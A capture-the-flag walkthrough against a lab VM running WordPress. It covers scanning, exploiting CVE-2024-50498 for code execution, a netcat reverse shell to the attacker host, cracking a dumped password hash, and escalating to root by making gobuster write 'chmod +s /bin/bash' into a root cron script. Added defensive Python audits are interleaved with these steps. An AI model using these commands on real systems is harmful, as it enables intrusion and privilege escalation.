Challenge URL
Information gathering
Host discovery
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:b0:9b:6b (Unknown)
192.168.56.105 08:00:27:da:56:11 (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.157 seconds (118.68 hosts/sec). 3 responded
Port scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 07:33 EST
Nmap scan report for 192.168.56.105
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey:
| 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
| 256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: bammmmuwe
|_http-generator: WordPress 6.7.1
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:DA:56:11 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds
Port 80 is running an HTTP service: a site built on WordPress.
I used wpscan for some information gathering.
At first I only ran wpscan --url http://192.168.56.105 -e u,ap, without the --plugins-detection aggressive mode.
I ran information gathering against the target several times but did not collect any vulnerability information.
Later I ran wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
and found that the site is affected by CVE-2024-50498.
┌──(root㉿LAPTOP-40PQI58C)-[/mnt/c/Users/legion]
└─# wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.105/ [192.168.56.105]
[+] Started: Mon Feb 24 20:36:52 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.105/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Outdated, released on 2024-11-21).
 | Found By: Meta Generator (Passive Detection)
 |  - http://192.168.56.105/, Match: 'WordPress 6.7.1'
 | Confirmed By: Rss Generator (Aggressive Detection)
 |  - http://192.168.56.105/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://192.168.56.105/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:14:12 <==================================> (109235 / 109235) 100.00% Time: 00:14:12
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.105/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://192.168.56.105/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/akismet/readme.txt

[+] feed
 | Location: http://192.168.56.105/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wp-query-console
 | Location: http://192.168.56.105/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/wp-query-console/, status: 403
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.56.105/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Feb 24 20:51:12 2025
[+] Requests Done: 109276
[+] Cached Requests: 42
[+] Data Sent: 29.237 MB
[+] Data Received: 33.165 MB
[+] Memory used: 478.477 MB
[+] Elapsed time: 00:14:20
I fired the payload straight at it and the page returned an error.
Executing phpinfo() worked fine,
but any other statement came back as a 400.
I ran var_dump(1): the page still returned 400, but the result was in the response.
In the phpinfo() output from before I could see the disabled functions,
yet commands could still be executed with backticks.
Pop a shell: nc -e /bin/sh 192.168.56.103 7777
That gives www-data privileges.
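The phpinfo() output listed disabled functions, yet backticks still ran commands. In PHP the backtick operator is implemented as shell_exec(), so it is only blocked when shell_exec itself appears in disable_functions. The following is an added example (my own code, not from the write-up or from the box) that parses a php.ini fragment and reports which process-execution functions remain callable; the ini text is constructed, and EXEC_FUNCTIONS is my own list of functions worth checking.

```python
"""Audit a php.ini disable_functions list for command-execution gaps.

Added example, not from the original write-up. The backtick operator is an
alias of shell_exec(), so a disable_functions list that omits shell_exec
still allows `cmd` even if exec/system/passthru are blocked.
"""
import re

# Functions that hand a string to a shell or spawn a process. Backticks are
# covered by shell_exec; pcntl_* only exist when the pcntl extension is
# loaded but cost nothing to list. (Assumed list, not from the page.)
EXEC_FUNCTIONS = {
    "exec", "passthru", "system", "shell_exec", "popen", "proc_open",
    "pcntl_exec", "pcntl_fork",
}


def parse_disable_functions(ini_text: str) -> set[str]:
    """Return the set of function names disabled in a php.ini fragment.

    Commented lines (';') are skipped; if the directive is repeated, the
    last uncommented occurrence wins, matching PHP's own behaviour.
    """
    disabled: set[str] = set()
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip('"')
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def execution_gaps(disabled: set[str]) -> list[str]:
    """Execution functions that are still callable given the disabled set."""
    return sorted(EXEC_FUNCTIONS - disabled)


def backticks_usable(disabled: set[str]) -> bool:
    """True when `cmd` would still run, i.e. shell_exec is not disabled."""
    return "shell_exec" not in disabled


# Constructed php.ini fragment resembling a half-hardened configuration.
SAMPLE_INI = """
; constructed sample, not the target's real php.ini
disable_functions = exec,passthru,system,popen,proc_open
"""

if __name__ == "__main__":
    d = parse_disable_functions(SAMPLE_INI)
    print("disabled:", sorted(d))
    print("still callable:", execution_gaps(d))
    print("backticks usable:", backticks_usable(d))
```

Run it against the real /etc/php/*/fpm/php.ini (or the output of php -i) to confirm that shell_exec is in the list; the sample above deliberately leaves it out, so the backtick path reported in the write-up is reproduced.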
There is a regular user called welcome, and WordPress also has a user named welcome.
I uploaded a PHP file that connects to the database and reads the users and passwords out of the WordPress database.
When I first saw this I had a brain freeze and thought about updating the hashed password to a known one.
Then it suddenly occurred to me that this welcome's password might be the password of the system user welcome,
so I took the hash and cracked it with john.
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# john --show hash
?:1045671

1 password hash cracked, 0 left
Then I logged into the system over SSH without trouble.
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# ssh welcome@192.168.56.105
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb 24 04:57:16 2025 from 192.168.56.103
$ whoami
welcome
sudo -l shows that /usr/bin/gobuster can be run with sudo without a password.
$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster
At first I had no idea what to do.
Then it occurred to me that I could point gobuster at /root/root.txt as its wordlist:
start an HTTP server on Kali with python -m http.server,
then run
sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt
Unfortunately the root flag is not called root.txt.
$ sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt
2025/02/24 08:12:20 [!] 1 error occurred:
	* Wordlist (-w): File does not exist: /root/root.txt
Next, pull down pspy and have a look:
the root user periodically executes /opt/.test.sh.
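A script that root runs on a schedule is only as safe as the permissions on it and on every directory above it. As an added example (my own code, not from the write-up), the audit below takes a script path, stats the file and each parent directory, and reports non-root ownership, world-write bits, and group-write bits for a non-root group. The snapshot dictionaries are constructed stand-ins for os.stat() results so the code runs offline; on a live host, call audit_script() with the default stat_fn. It does not cover the route the write-up actually used, a sudo rule on a binary that writes files, which is a sudoers review rather than a permissions check.

```python
"""Check whether a script run by root from cron can be altered by non-root users.

Added example, not part of the original write-up. The constructed
snapshots below model /opt/.test.sh, the script pspy showed root executing.
"""
import os
import stat
from collections import namedtuple
from pathlib import PurePosixPath


def classify(path: str, uid: int, gid: int, mode: int) -> list[str]:
    """Findings for one filesystem entry; an empty list means it looks fine."""
    findings = []
    if uid != 0:
        findings.append(f"{path}: owned by uid {uid}, not root")
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    elif mode & stat.S_IWGRP and gid != 0:
        findings.append(f"{path}: writable by non-root group gid {gid}")
    return findings


def audit_script(script: str, stat_fn=os.stat) -> list[str]:
    """Audit the script and each parent directory using stat_fn(path).

    Parent directories are checked too: write access to the directory is
    enough to swap the file out even when the file itself is 0644 root.
    """
    p = PurePosixPath(script)
    findings: list[str] = []
    for part in [str(p)] + [str(a) for a in p.parents]:
        st = stat_fn(part)
        findings += classify(part, st.st_uid, st.st_gid, st.st_mode)
    return findings


# Constructed stand-in for os.stat results: (st_uid, st_gid, st_mode).
FakeStat = namedtuple("FakeStat", "st_uid st_gid st_mode")

# Snapshot 1 (constructed): root-owned script that was chmod 777 by mistake.
WORLD_WRITABLE_SCRIPT = {
    "/": FakeStat(0, 0, stat.S_IFDIR | 0o755),
    "/opt": FakeStat(0, 0, stat.S_IFDIR | 0o755),
    "/opt/.test.sh": FakeStat(0, 0, stat.S_IFREG | 0o777),
}

# Snapshot 2 (constructed): script is 0644 root, but /opt is group-writable
# by gid 1001, so the weakness is in the directory rather than the file.
WRITABLE_PARENT = {
    "/": FakeStat(0, 0, stat.S_IFDIR | 0o755),
    "/opt": FakeStat(0, 1001, stat.S_IFDIR | 0o775),
    "/opt/.test.sh": FakeStat(0, 0, stat.S_IFREG | 0o644),
}


def demo(snapshot: dict) -> list[str]:
    """Run the audit against a constructed snapshot instead of the live host."""
    return audit_script("/opt/.test.sh", stat_fn=snapshot.__getitem__)


if __name__ == "__main__":
    for label, snap in (("777 script", WORLD_WRITABLE_SCRIPT),
                        ("g+w /opt", WRITABLE_PARENT)):
        print(label, "->", demo(snap) or ["clean"])
```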
That gave me an idea:
start an HTTP server with Python and, inside its root, create the nested folders and file
bin / chmod +s / bin / bash.
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm/empty]
└─# tree
.
└── bin
    └── chmod +s
        └── bin
            └── bash

4 directories, 1 file
Then create a wordlist file containing only the line bin/chmod +s /bin/bash
$ cat 1
bin/chmod +s /bin/bash
and run sudo /usr/bin/gobuster -u http://192.168.56.103:8000/ -w /home/welcome/1 -o res
welcome@listen:~$ cat res
/bin/chmod +s /bin/bash (Status: 200)
welcome@listen:~$
The result is what we want,
but with an extra (Status: 200) appended.
I later learned that the -n parameter suppresses the status code.
After adding -n to the command:
welcome@listen:~$ cat res
/bin/chmod +s /bin/bash
welcome@listen:~$
Nothing follows the line any more,
which is exactly what we want.
The next step is to write it into /opt/.test.sh
by running sudo /usr/bin/gobuster -u "http://192.168.56.103:8000/" -w /home/welcome/1 -o /opt/.test.sh -n
Check the permissions on /bin/bash again: the s bit has been set.
welcome@listen:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
welcome@listen:~$
Then run bash -p and you have root privileges.
welcome@listen:~$ bash -p
bash-5.0# whoami
root
bash-5.0# id
uid=1001(welcome) gid=1001(welcome) euid=0(root) egid=0(root) groups=0(root),1001(welcome)
bash-5.0#
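The escalation left /bin/bash with mode -rwsr-sr-x, a change a periodic setuid inventory would flag within one run. As an added example (my own code, not from the write-up), the block below collects setuid/setgid regular files from (path, mode) pairs, diffs them against a baseline, and includes a walker for a live filesystem. The BASELINE and AFTER inventories are constructed and only loosely modelled on a Debian host; the intent is to show the diff, not a reference list of expected setuid binaries.

```python
"""Detect newly set-uid or set-gid binaries by diffing against a baseline.

Added example, not from the original write-up. Take the baseline with
walk_modes() on a freshly installed host, store it, and compare on a
schedule; the constructed inventories below stand in for two such runs.
"""
import os
import stat
from typing import Iterable

Entry = tuple[str, int]  # (path, st_mode as returned by os.lstat)


def setuid_entries(entries: Iterable[Entry]) -> set[str]:
    """Paths of regular files with the setuid or setgid bit set.

    Directories with setgid (shared project dirs) are normal and skipped.
    """
    return {
        path for path, mode in entries
        if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID)
    }


def walk_modes(root: str) -> Iterable[Entry]:
    """Yield (path, mode) for every file under root, for live-host use."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                yield full, os.lstat(full).st_mode
            except OSError:
                continue  # vanished or unreadable; skip rather than abort


def diff_against_baseline(baseline: set[str], current: set[str]) -> dict[str, list[str]]:
    """Report setuid paths that appeared or disappeared since the baseline."""
    return {
        "added": sorted(current - baseline),
        "removed": sorted(baseline - current),
    }


# Constructed inventories (not real scan output). 'AFTER' is the same host
# once /bin/bash has been given the s bits, as in the write-up.
BASELINE = [
    ("/bin/su", stat.S_IFREG | 0o4755),
    ("/bin/bash", stat.S_IFREG | 0o755),
    ("/usr/bin/sudo", stat.S_IFREG | 0o4755),
    ("/var/local", stat.S_IFDIR | 0o2775),  # setgid dir, should not alert
]
AFTER = [
    ("/bin/su", stat.S_IFREG | 0o4755),
    ("/bin/bash", stat.S_IFREG | 0o6755),  # -rwsr-sr-x
    ("/usr/bin/sudo", stat.S_IFREG | 0o4755),
    ("/var/local", stat.S_IFDIR | 0o2775),
]


def demo_diff() -> dict[str, list[str]]:
    """Diff the two constructed inventories."""
    return diff_against_baseline(setuid_entries(BASELINE), setuid_entries(AFTER))


if __name__ == "__main__":
    print(demo_diff())
```

Pair the diff with file-integrity checks on the sudoers file itself: a NOPASSWD rule on a tool that takes an output path is what made the root-owned script writable in the first place.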